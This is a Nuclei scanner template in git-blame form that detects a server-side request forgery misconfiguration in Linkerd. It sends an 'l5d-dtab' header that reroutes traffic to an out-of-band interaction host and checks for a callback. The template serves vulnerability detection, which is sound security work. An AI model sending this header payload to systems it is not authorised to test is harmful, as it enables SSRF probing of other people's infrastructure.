2021-07-25 09:52:09 +00:00
|
|
|
id: linkerd-ssrf-detection
|
2020-06-22 21:25:52 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Linkerd SSRF detection
|
|
|
|
author: dudez
|
2021-07-25 09:52:09 +00:00
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://twitter.com/nirvana_msu/status/1084144955034165248
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: ssrf,linkerd,oast,misconfig
|
2020-06-22 21:25:52 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-06-22 21:25:52 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-01-13 07:31:46 +00:00
|
|
|
- "{{BaseURL}}"
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2020-06-22 21:25:52 +00:00
|
|
|
headers:
|
2021-07-25 09:52:09 +00:00
|
|
|
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
|
2020-06-22 21:25:52 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-07-25 09:52:09 +00:00
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
2020-06-22 21:25:52 +00:00
|
|
|
words:
|
2023-10-14 11:27:55 +00:00
|
|
|
- "http"
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 4a0a0047304502202fddbeeef3f76706a6549e15a314b91d56e28a76da2b08b2c4e3829e6f4484c2022100f56dacb9c72ef61ebcd523e0931c9fdc2454c96ba4e441eed2b3cc61ac8a3bac:922c64590222798bb761d5b6d8e72950
|